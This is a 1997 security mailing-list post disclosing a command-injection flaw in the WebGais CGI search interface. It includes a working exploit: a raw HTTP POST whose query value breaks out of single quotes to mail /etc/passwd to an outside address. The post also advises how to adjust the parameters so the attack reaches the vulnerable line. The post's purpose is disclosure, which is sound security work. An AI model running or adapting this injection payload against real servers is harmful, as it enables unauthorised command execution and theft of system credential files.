Vulnerability in WEBgais

Razvan Dragomirescu (drazvan@KAPPA.RO)
Thu, 10 Jul 1997 19:03:14 +0300

Hi,

This one is really short. I'm leaving town tomorrow, so I had no time to
"refine" this. It will require a little bit of work from you this time.

So here it is:

WebGais is an interface to the GAIS search tool. It installs a few
programs in /cgi-bin. The main utility is called "webgais" and does the
actual interfacing with the search tool.

It reads the query from a user form, and then runs the GAIS search engine
for that query. The author tried to protect the program by
using single quotes around the query when he passed it to a "system"
command. But he forgot one VERY important thing: to strip single quotes
from the query (this was done in Glimpse).
So, if we send a query like:
query=';mail+foo@somewhere.net</etc/passwd;echo'&.....
we will trick the "protection" system.

The only problem here is that you have to provide a certain combination of
input parameters, to reach the vulnerable line in the script. It took me
about half an hour to get those parameters right.

I also had to comment some code from the script to bypass some error
messages, because I do not have the GAIS search tool installed, I only
have the WEBGais interface. Of course, you won't have to modify the script
at all. It should work just fine as it is.
So here's how I exploited this:

telnet target.machine.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit"
line)

query=';mail+drazvan\@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph

... and it worked. But to make it work for your system too, you'll have to
add other parameters, like idx_dir and data_type who are required by the
script in its original version. Just make a normal query to your WebGais
server and see what all the parameters are. But remember to use "output" and
"domain" as specified in my exploit. Otherwise you will end up in some
other place of the script and nothing will happen.

Again, I'm sorry this is not as documented as you would have expected.
I will not be able to provide support for this. I will not have Internet
access for about a month. But I'm sure someone will complete this as soon
as possible (maybe the guys at SecNet who seemed really interested...).

See you all in August.
Be good.
Razvan

--
Razvan Dragomirescu
drazvan@kappa.ro, drazvan@romania.ro, drazvan@roedu.net
Phone: +40-1-6866621
"Smile, tomorrow will be worse" (Murphy)